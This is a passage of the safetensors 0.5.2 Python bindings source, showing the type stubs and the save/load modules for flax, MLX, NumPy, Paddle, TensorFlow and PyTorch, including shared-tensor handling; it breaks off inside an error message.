tensors as asked Args: data (`bytes`): The byte content of a file Returns: (`List[str, Dict[str, Dict[str, any]]]`): The deserialized content is like: [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] """ pass @staticmethod def serialize(tensor_dict, metadata=None): """ Serializes raw data. 
Args: tensor_dict (`Dict[str, Dict[Any]]`): The tensor dict is like: {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} metadata (`Dict[str, str]`, *optional*): The optional purely text annotations Returns: (`bytes`): The serialized content. """ pass @staticmethod def serialize_file(tensor_dict, filename, metadata=None): """ Serializes raw data. Args: tensor_dict (`Dict[str, Dict[Any]]`): The tensor dict is like: {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} filename (`str`, or `os.PathLike`): The name of the file to write into. metadata (`Dict[str, str]`, *optional*): The optional purely text annotations Returns: (`bytes`): The serialized content. """ pass class safe_open: """ Opens a safetensors lazily and returns tensors as asked Args: filename (`str`, or `os.PathLike`): The filename to open framework (`str`): The framework you want you tensors in. Supported values: `pt`, `tf`, `flax`, `numpy`. device (`str`, defaults to `"cpu"`): The device on which you want the tensors. """ def __init__(self, filename, framework, device=...): pass def __enter__(self): """ Start the context manager """ pass def __exit__(self, _exc_type, _exc_value, _traceback): """ Exits the context manager """ pass def get_slice(self, name): """ Returns a full slice view object Args: name (`str`): The name of the tensor you want Returns: (`PySafeSlice`): A dummy object you can slice into to get a real tensor Example: ```python from safetensors import safe_open with safe_open("model.safetensors", framework="pt", device=0) as f: tensor_part = f.get_slice("embedding")[:, ::8] ``` """ pass def get_tensor(self, name): """ Returns a full tensor Args: name (`str`): The name of the tensor you want Returns: (`Tensor`): The tensor in the framework you opened the file for. Example: ```python from safetensors import safe_open with safe_open("model.safetensors", framework="pt", device=0) as f: tensor = f.get_tensor("embedding") ``` """ pass def keys(self): """ Returns the names of the tensors in the file. Returns: (`List[str]`): The name of the tensors contained in that file """ pass def metadata(self): """ Return the special non tensor information in the header Returns: (`Dict[str, str]`): The freeform metadata. """ pass class SafetensorError(Exception): """ Custom Python Exception for Safetensor errors. """ safetensors-0.5.2/bindings/python/py_src/safetensors/flax.py000066400000000000000000000074061473753372300243540ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import jax.numpy as jnp from jax import Array from safetensors import numpy, safe_open def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, Array]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. 
Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.flax import save from jax import numpy as jnp tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _jnp2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, Array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, Array]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.flax import save_file from jax import numpy as jnp tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _jnp2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, Array]: """ Loads a safetensors file into flax format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu Example: ```python from safetensors.flax import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2jnp(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: """ Loads a safetensors file into flax format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, Array]`: dictionary that contains name as key, value as `Array` Example: ```python from safetensors.flax import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="flax") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: for k, v in numpy_dict.items(): numpy_dict[k] = jnp.array(v) return numpy_dict def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: for k, v in jnp_dict.items(): jnp_dict[k] = np.asarray(v) return jnp_dict safetensors-0.5.2/bindings/python/py_src/safetensors/mlx.py000066400000000000000000000073751473753372300242270ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import mlx.core as mx from safetensors import numpy, safe_open def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, mx.array]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. 
Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.mlx import save import mlx.core as mx tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _mx2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, mx.array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, mx.array]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.mlx import save_file import mlx.core as mx tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _mx2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, mx.array]: """ Loads a safetensors file into MLX format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` Example: ```python from safetensors.mlx import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2mx(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]: """ Loads a safetensors file into MLX format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` Example: ```python from safetensors.flax import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="mlx") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]: for k, v in numpy_dict.items(): numpy_dict[k] = mx.array(v) return numpy_dict def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]: new_dict = {} for k, v in mx_dict.items(): new_dict[k] = np.asarray(v) return new_dict safetensors-0.5.2/bindings/python/py_src/safetensors/numpy.py000066400000000000000000000115111473753372300245620ustar00rootroot00000000000000import os import sys from typing import Dict, Optional, Union import numpy as np from safetensors import deserialize, safe_open, serialize, serialize_file def _tobytes(tensor: np.ndarray) -> bytes: if not _is_little_endian(tensor): tensor = tensor.byteswap(inplace=False) return tensor.tobytes() def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensor_dict (`Dict[str, np.ndarray]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. 
This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.numpy import save import numpy as np tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} byte_data = save(tensors) ``` """ flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} serialized = serialize(flattened, metadata=metadata) result = bytes(serialized) return result def save_file( tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensor_dict (`Dict[str, np.ndarray]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.numpy import save_file import numpy as np tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} serialize_file(flattened, filename, metadata=metadata) def load(data: bytes) -> Dict[str, np.ndarray]: """ Loads a safetensors file into numpy format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu Example: ```python from safetensors.numpy import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = deserialize(data) return _view2np(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: """ Loads a safetensors file into numpy format. 
Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` Example: ```python from safetensors.numpy import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="np") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result _TYPES = { "F64": np.float64, "F32": np.float32, "F16": np.float16, "I64": np.int64, "U64": np.uint64, "I32": np.int32, "U32": np.uint32, "I16": np.int16, "U16": np.uint16, "I8": np.int8, "U8": np.uint8, "BOOL": bool, } def _getdtype(dtype_str: str) -> np.dtype: return _TYPES[dtype_str] def _view2np(safeview) -> Dict[str, np.ndarray]: result = {} for k, v in safeview: dtype = _getdtype(v["dtype"]) arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) result[k] = arr return result def _is_little_endian(tensor: np.ndarray) -> bool: byteorder = tensor.dtype.byteorder if byteorder == "=": if sys.byteorder == "little": return True else: return False elif byteorder == "|": return True elif byteorder == "<": return True elif byteorder == ">": return False raise ValueError(f"Unexpected byte order {byteorder}") safetensors-0.5.2/bindings/python/py_src/safetensors/paddle.py000066400000000000000000000101171473753372300246440ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import paddle from safetensors import numpy def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, paddle.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.paddle import save import paddle tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _paddle2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, paddle.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, paddle.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.paddle import save_file import paddle tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _paddle2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: """ Loads a safetensors file into paddle format from pure bytes. 
Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu Example: ```python from safetensors.paddle import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2paddle(flat, device) def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]: """ Loads a safetensors file into paddle format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular paddle device locations Returns: `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` Example: ```python from safetensors.paddle import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ flat = numpy.load_file(filename) output = _np2paddle(flat, device) return output def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]: for k, v in numpy_dict.items(): numpy_dict[k] = paddle.to_tensor(v, place=device) return numpy_dict def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: for k, v in paddle_dict.items(): paddle_dict[k] = v.detach().cpu().numpy() return paddle_dict safetensors-0.5.2/bindings/python/py_src/safetensors/py.typed000066400000000000000000000000001473753372300245260ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/tensorflow.py000066400000000000000000000074621473753372300256260ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import tensorflow as tf from safetensors import numpy, safe_open def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, tf.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.tensorflow import save import tensorflow as tf tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _tf2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, tf.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, tf.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. 
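Under the hood, the tensors are converted to NumPy arrays with `.numpy()` and written via `safetensors.numpy.save_file`.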
Returns: `None` Example: ```python from safetensors.tensorflow import save_file import tensorflow as tf tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _tf2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, tf.Tensor]: """ Loads a safetensors file into tensorflow format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu Example: ```python from safetensors.tensorflow import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2tf(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: """ Loads a safetensors file into tensorflow format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` Example: ```python from safetensors.tensorflow import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="tf") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: for k, v in numpy_dict.items(): numpy_dict[k] = tf.convert_to_tensor(v) return numpy_dict def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: for k, v in tf_dict.items(): tf_dict[k] = v.numpy() return tf_dict safetensors-0.5.2/bindings/python/py_src/safetensors/torch.py000066400000000000000000000426361473753372300245450ustar00rootroot00000000000000import os import sys from collections import defaultdict from typing import Any, Dict, List, Optional, Set, Tuple, Union import torch from safetensors import deserialize, safe_open, serialize, serialize_file def storage_ptr(tensor: torch.Tensor) -> int: try: return tensor.untyped_storage().data_ptr() except Exception: # Fallback for torch==1.10 try: return tensor.storage().data_ptr() except NotImplementedError: # Fallback for meta storage return 0 def _end_ptr(tensor: torch.Tensor) -> int: if tensor.nelement(): stop = tensor.view(-1)[-1].data_ptr() + _SIZE[tensor.dtype] else: stop = tensor.data_ptr() return stop def storage_size(tensor: torch.Tensor) -> int: try: return tensor.untyped_storage().nbytes() except AttributeError: # Fallback for torch==1.10 try: return tensor.storage().size() * _SIZE[tensor.dtype] except NotImplementedError: # Fallback for meta storage # On torch >=2.0 this is the tensor size return tensor.nelement() * _SIZE[tensor.dtype] def _filter_shared_not_shared(tensors: List[Set[str]], state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]: filtered_tensors = [] for shared in tensors: if len(shared) < 2: filtered_tensors.append(shared) continue areas = [] for name in shared: tensor = state_dict[name] areas.append((tensor.data_ptr(), _end_ptr(tensor), name)) areas.sort() _, last_stop, last_name = areas[0] filtered_tensors.append({last_name}) for start, stop, name in areas[1:]: if start >= last_stop: filtered_tensors.append({name}) else: filtered_tensors[-1].add(name) last_stop = stop return filtered_tensors def _find_shared_tensors(state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]: tensors = defaultdict(set) for k, v in state_dict.items(): if v.device != 
torch.device("meta") and storage_ptr(v) != 0 and storage_size(v) != 0: # Need to add device as key because of multiple GPU. tensors[(v.device, storage_ptr(v), storage_size(v))].add(k) tensors = list(sorted(tensors.values())) tensors = _filter_shared_not_shared(tensors, state_dict) return tensors def _is_complete(tensor: torch.Tensor) -> bool: return tensor.data_ptr() == storage_ptr(tensor) and tensor.nelement() * _SIZE[tensor.dtype] == storage_size(tensor) def _remove_duplicate_names( state_dict: Dict[str, torch.Tensor], *, preferred_names: Optional[List[str]] = None, discard_names: Optional[List[str]] = None, ) -> Dict[str, List[str]]: if preferred_names is None: preferred_names = [] preferred_names = set(preferred_names) if discard_names is None: discard_names = [] discard_names = set(discard_names) shareds = _find_shared_tensors(state_dict) to_remove = defaultdict(list) for shared in shareds: complete_names = set([name for name in shared if _is_complete(state_dict[name])]) if not complete_names: raise RuntimeError( "Error while trying to find names to remove to save state dict, but found no suitable name to keep" f" for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model" " since you could be storing much more memory than needed. Please refer to" " https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an" " issue." ) keep_name = sorted(list(complete_names))[0] # Mechanism to preferentially select keys to keep # coming from the on-disk file to allow # loading models saved with a different choice # of keep_name preferred = complete_names.difference(discard_names) if preferred: keep_name = sorted(list(preferred))[0] if preferred_names: preferred = preferred_names.intersection(complete_names) if preferred: keep_name = sorted(list(preferred))[0] for name in sorted(shared): if name != keep_name: to_remove[keep_name].append(name) return to_remove def save_model( model: torch.nn.Module, filename: str, metadata: Optional[Dict[str, str]] = None, force_contiguous: bool = True ): """ Saves a given torch model to specified filename. This method exists specifically to avoid tensor sharing issues which are not allowed in `safetensors`. [More information on tensor sharing](../torch_shared_tensors) Args: model (`torch.nn.Module`): The model to save on disk. filename (`str`): The filename location to save the file metadata (`Dict[str, str]`, *optional*): Extra information to save along with the file. Some metadata will be added for each dropped tensors. This information will not be enough to recover the entire shared structure but might help understanding things force_contiguous (`boolean`, *optional*, defaults to True): Forcing the state_dict to be saved as contiguous tensors. This has no effect on the correctness of the model, but it could potentially change performance if the layout of the tensor was chosen specifically for that reason. """ state_dict = model.state_dict() to_removes = _remove_duplicate_names(state_dict) for kept_name, to_remove_group in to_removes.items(): for to_remove in to_remove_group: if metadata is None: metadata = {} if to_remove not in metadata: # Do not override user data metadata[to_remove] = kept_name del state_dict[to_remove] if force_contiguous: state_dict = {k: v.contiguous() for k, v in state_dict.items()} try: save_file(state_dict, filename, metadata=metadata) except ValueError as e: msg = str(e) msg += " Or use save_model(..., force_contiguous=True), read the docs for potential caveats." 
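# Raise a new ValueError carrying the original message plus the `force_contiguous` hint,
# since non-contiguous tensors are a common cause of serialization failures here.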
raise ValueError(msg) def load_model( model: torch.nn.Module, filename: Union[str, os.PathLike], strict: bool = True, device: Union[str, int] = "cpu" ) -> Tuple[List[str], List[str]]: """ Loads a given filename onto a torch model. This method exists specifically to avoid tensor sharing issues which are not allowed in `safetensors`. [More information on tensor sharing](../torch_shared_tensors) Args: model (`torch.nn.Module`): The model to load onto. filename (`str`, or `os.PathLike`): The filename location to load the file from. strict (`bool`, *optional*, defaults to True): Whether to fail if you're missing keys or having unexpected ones. When false, the function simply returns missing and unexpected names. device (`Union[str, int]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular torch device locations. Returns: `(missing, unexpected): (List[str], List[str])` `missing` are names in the model which were not modified during loading `unexpected` are names that are on the file, but weren't used during the load. """ state_dict = load_file(filename, device=device) model_state_dict = model.state_dict() to_removes = _remove_duplicate_names(model_state_dict, preferred_names=state_dict.keys()) missing, unexpected = model.load_state_dict(state_dict, strict=False) missing = set(missing) for to_remove_group in to_removes.values(): for to_remove in to_remove_group: if to_remove not in missing: unexpected.append(to_remove) else: missing.remove(to_remove) if strict and (missing or unexpected): missing_keys = ", ".join([f'"{k}"' for k in sorted(missing)]) unexpected_keys = ", ".join([f'"{k}"' for k in sorted(unexpected)]) error = f"Error(s) in loading state_dict for {model.__class__.__name__}:" if missing: error += f"\n Missing key(s) in state_dict: {missing_keys}" if unexpected: error += f"\n Unexpected key(s) in state_dict: {unexpected_keys}" raise RuntimeError(error) return missing, unexpected def save(tensors: Dict[str, torch.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, torch.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.torch import save import torch tensors = {"embedding": torch.zeros((512, 1024)), "attention": torch.zeros((256, 256))} byte_data = save(tensors) ``` """ serialized = serialize(_flatten(tensors), metadata=metadata) result = bytes(serialized) return result def save_file( tensors: Dict[str, torch.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ): """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, torch.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. 
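Note that, unlike `save_model`, this function does not resolve shared tensors: if any tensors in the dict share the same underlying storage, serialization raises an error pointing you to `save_model`.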
Returns: `None` Example: ```python from safetensors.torch import save_file import torch tensors = {"embedding": torch.zeros((512, 1024)), "attention": torch.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ serialize_file(_flatten(tensors), filename, metadata=metadata) def load_file(filename: Union[str, os.PathLike], device: Union[str, int] = "cpu") -> Dict[str, torch.Tensor]: """ Loads a safetensors file into torch format. Args: filename (`str`, or `os.PathLike`): The name of the file which contains the tensors device (`Union[str, int]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular torch device locations. Returns: `Dict[str, torch.Tensor]`: dictionary that contains name as key, value as `torch.Tensor` Example: ```python from safetensors.torch import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="pt", device=device) as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def load(data: bytes) -> Dict[str, torch.Tensor]: """ Loads a safetensors file into torch format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, torch.Tensor]`: dictionary that contains name as key, value as `torch.Tensor` on cpu Example: ```python from safetensors.torch import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = deserialize(data) return _view2torch(flat) # torch.float8 formats require 2.1; we do not support these dtypes on earlier versions _float8_e4m3fn = getattr(torch, "float8_e4m3fn", None) _float8_e5m2 = getattr(torch, "float8_e5m2", None) _SIZE = { torch.int64: 8, torch.float32: 4, torch.int32: 4, torch.bfloat16: 2, torch.float16: 2, torch.int16: 2, torch.uint8: 1, torch.int8: 1, torch.bool: 1, torch.float64: 8, _float8_e4m3fn: 1, _float8_e5m2: 1, } _TYPES = { "F64": torch.float64, "F32": torch.float32, "F16": torch.float16, "BF16": torch.bfloat16, "I64": torch.int64, # "U64": torch.uint64, "I32": torch.int32, # "U32": torch.uint32, "I16": torch.int16, # "U16": torch.uint16, "I8": torch.int8, "U8": torch.uint8, "BOOL": torch.bool, "F8_E4M3": _float8_e4m3fn, "F8_E5M2": _float8_e5m2, } def _getdtype(dtype_str: str) -> torch.dtype: return _TYPES[dtype_str] def _view2torch(safeview) -> Dict[str, torch.Tensor]: result = {} for k, v in safeview: dtype = _getdtype(v["dtype"]) if len(v["data"]) == 0: # Workaround because frombuffer doesn't accept zero-size tensors assert any(x == 0 for x in v["shape"]) arr = torch.empty(v["shape"], dtype=dtype) else: arr = torch.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) if sys.byteorder == "big": arr = torch.from_numpy(arr.numpy().byteswap(inplace=False)) result[k] = arr return result def _tobytes(tensor: torch.Tensor, name: str) -> bytes: if tensor.layout != torch.strided: raise ValueError( f"You are trying to save a sparse tensor: `{name}` which this library does not support." " You can make it a dense tensor before saving with `.to_dense()` but be aware this might" " make a much larger file than needed." ) if not tensor.is_contiguous(): raise ValueError( f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. 
It either means you" " are trying to save tensors which are reference of each other in which case it's recommended to save" " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to" " pack it before saving." ) if tensor.device.type != "cpu": # Moving tensor to cpu before saving tensor = tensor.to("cpu") import ctypes import numpy as np # When shape is empty (scalar), np.prod returns a float # we need a int for the following calculations length = int(np.prod(tensor.shape).item()) bytes_per_item = _SIZE[tensor.dtype] total_bytes = length * bytes_per_item ptr = tensor.data_ptr() if ptr == 0: return b"" newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte)) data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy if sys.byteorder == "big": NPDTYPES = { torch.int64: np.int64, torch.float32: np.float32, torch.int32: np.int32, # XXX: This is ok because both have the same width torch.bfloat16: np.float16, torch.float16: np.float16, torch.int16: np.int16, torch.uint8: np.uint8, torch.int8: np.int8, torch.bool: bool, torch.float64: np.float64, # XXX: This is ok because both have the same width and byteswap is a no-op anyway _float8_e4m3fn: np.uint8, _float8_e5m2: np.uint8, } npdtype = NPDTYPES[tensor.dtype] # Not in place as that would potentially modify a live running model data = data.view(npdtype).byteswap(inplace=False) return data.tobytes() def _flatten(tensors: Dict[str, torch.Tensor]) -> Dict[str, Dict[str, Any]]: if not isinstance(tensors, dict): raise ValueError(f"Expected a dict of [str, torch.Tensor] but received {type(tensors)}") invalid_tensors = [] for k, v in tensors.items(): if not isinstance(v, torch.Tensor): raise ValueError(f"Key `{k}` is invalid, expected torch.Tensor but received {type(v)}") if v.layout != torch.strided: invalid_tensors.append(k) if invalid_tensors: raise ValueError( f"You are trying to save a sparse tensors: `{invalid_tensors}` which this library does not support." " You can make it a dense tensor before saving with `.to_dense()` but be aware this might" " make a much larger file than needed." ) shared_pointers = _find_shared_tensors(tensors) failing = [] for names in shared_pointers: if len(names) > 1: failing.append(names) if failing: raise RuntimeError( f""" Some tensors share memory, this will lead to duplicate memory on disk and potential differences when loading them again: {failing}. A potential way to correctly save your model is to use `save_model`. 
